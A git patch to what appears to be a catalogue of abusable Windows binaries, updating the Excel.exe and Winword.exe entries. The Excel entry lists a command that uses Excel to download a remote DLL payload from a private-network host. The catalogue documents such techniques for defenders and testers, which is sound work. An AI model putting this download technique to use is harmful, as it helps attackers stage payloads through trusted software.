From 32757cd0c3f99518730607350e4d2136e18bad83 Mon Sep 17 00:00:00 2001
From: Oddvar Moe <oddvar.moe@gmail.com>
Date: Tue, 17 Sep 2019 22:58:03 +0200
Subject: [PATCH] Added Office binaries from jreegun to the project. Pull
 request 42

---
 yml/OtherMSBinaries/Excel.yml   | 10 +++++++---
 yml/OtherMSBinaries/Winword.yml |  8 ++++++--
 2 files changed, 13 insertions(+), 5 deletions(-)

diff --git a/yml/OtherMSBinaries/Excel.yml b/yml/OtherMSBinaries/Excel.yml
index c61df04..6aba87a 100644
--- a/yml/OtherMSBinaries/Excel.yml
+++ b/yml/OtherMSBinaries/Excel.yml
@@ -1,10 +1,10 @@
 ---
 Name: Excel.exe
-Description: Microsoft Office binary.
+Description: Microsoft Office binary
 Author: 'Reegun J (OCBC Bank)'
 Created: '2019-07-19'
 Commands:
-  - Command: Excel.exe "http://192.168.1.10/TeamsAddinLoader.dll"
+  - Command: Excel.exe http://192.168.1.10/TeamsAddinLoader.dll
     Description: Downloads payload from remote server
     Usecase: It will download a remote payload and place it in the cache folder
     Category: Download
@@ -28,10 +28,14 @@ Full_Path:
   - Path: C:\Program Files (x86)\Microsoft Office\Office12\Excel.exe
   - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
   - Path: C:\Program Files\Microsoft Office\Office12\Excel.exe
+Code_Sample:
+  - Code:
+Detection:
+  - IOC:
 Resources:
   - Link: https://twitter.com/reegun21/status/1150032506504151040
   - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
 Acknowledgement:
-  - Person: Reegun J (OCBC Bank)
+  - Person: 'Reegun J (OCBC Bank)'
     Handle: '@reegun21'
 ---
\ No newline at end of file
diff --git a/yml/OtherMSBinaries/Winword.yml b/yml/OtherMSBinaries/Winword.yml
index 3b3e6fb..b39a89f 100644
--- a/yml/OtherMSBinaries/Winword.yml
+++ b/yml/OtherMSBinaries/Winword.yml
@@ -1,6 +1,6 @@
 ---
 Name: Winword.exe
-Description: Microsoft Office binary.
+Description: Microsoft Office binary
 Author: 'Reegun J (OCBC Bank)'
 Created: '2019-07-19'
 Commands:
@@ -28,10 +28,14 @@ Full_Path:
   - Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
   - Path: C:\Program Files\Microsoft Office\Office12\winword.exe
   - Path: C:\Program Files\Microsoft Office\Office12\winword.exe
+Code_Sample:
+  - Code:
+Detection:
+  - IOC:
 Resources:
   - Link: https://twitter.com/reegun21/status/1150032506504151040
   - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
 Acknowledgement:
-  - Person: Reegun J (OCBC Bank)
+  - Person: 'Reegun J (OCBC Bank)'
     Handle: '@reegun21'
 ---
\ No newline at end of file